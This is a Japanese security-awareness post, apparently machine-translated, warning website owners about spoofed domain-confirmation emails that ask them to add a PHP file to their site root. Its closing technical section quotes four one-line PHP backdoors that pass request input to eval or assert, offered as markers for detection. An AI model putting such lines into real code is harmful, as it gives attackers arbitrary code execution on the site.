偽のドメイン確認メールを信用しないでください
Web サイトで PHP コードの作成、ダウンロード、またはインストールを要求する手紙を受け取った場合は、無視してください。
English version: Do not trust those fake domain confirmation emails
最近、クライアントの何人かが、ドメイン レジストラから奇妙な電子メール レターを受け取りました。これらの手紙には、独自のドメインの確認の要求が含まれています。私はそれらの手紙の1つをチェックし、すぐにそれが詐欺的な手紙であることを確認しました.すべての文字は同一のパターンと、特定の名前と特定のコンテンツを持つ Web サイトのルート フォルダーに PHP ファイルを作成する要求を持っています。言うまでもなく、その PHP ファイルの提案されたコンテンツには、バックドア コードとして知られる悪意のあるコードが含まれています。この種のコードにより、攻撃者は被害者の Web サイトで任意のアクションを実行できます。
PHP コードの作成、ダウンロード、または Web サイトへのインストールを要求する手紙を受け取った場合は、無視してください。例外なく。社長やお母さんからの手紙でも構いません。
正規の差出人電子メール アドレスがあるため、不正な手紙は正規のように見えます。しかし、これはなりすましメールです。友達やドメイン レジストラーから偽のメールが届くとは思っていません。右?いいえ!電子メール レターには、送信者の電子メール アドレスを含めることができます。ほとんどの電子メール サーバーと電子メール クライアントは、送信者アドレスをチェックまたは検証しません。したがって、ハッカーが望んでいたと見なされます。既知の送信者から受け取った電子メール レターに、ウェブサイトへのコードのインストールやコンピューターへのアプリケーションのインストールなどの疑わしいアクションの要求が含まれている場合は、信頼してはなりません。
技術的な詳細
通常、偽の電子メールには、次の PHP 行の一部が含まれています。
assert(stripslashes($_REQUEST['something']));
eval(stripslashes($_REQUEST['something']));
assert(base64_decode($_REQUEST['something']));
eval(base64_decode($_REQUEST['something']));
参考までに: base64_decode、eval、および assert は、疑わしいまたは悪意のある PHP コードのよく知られたマーカーです。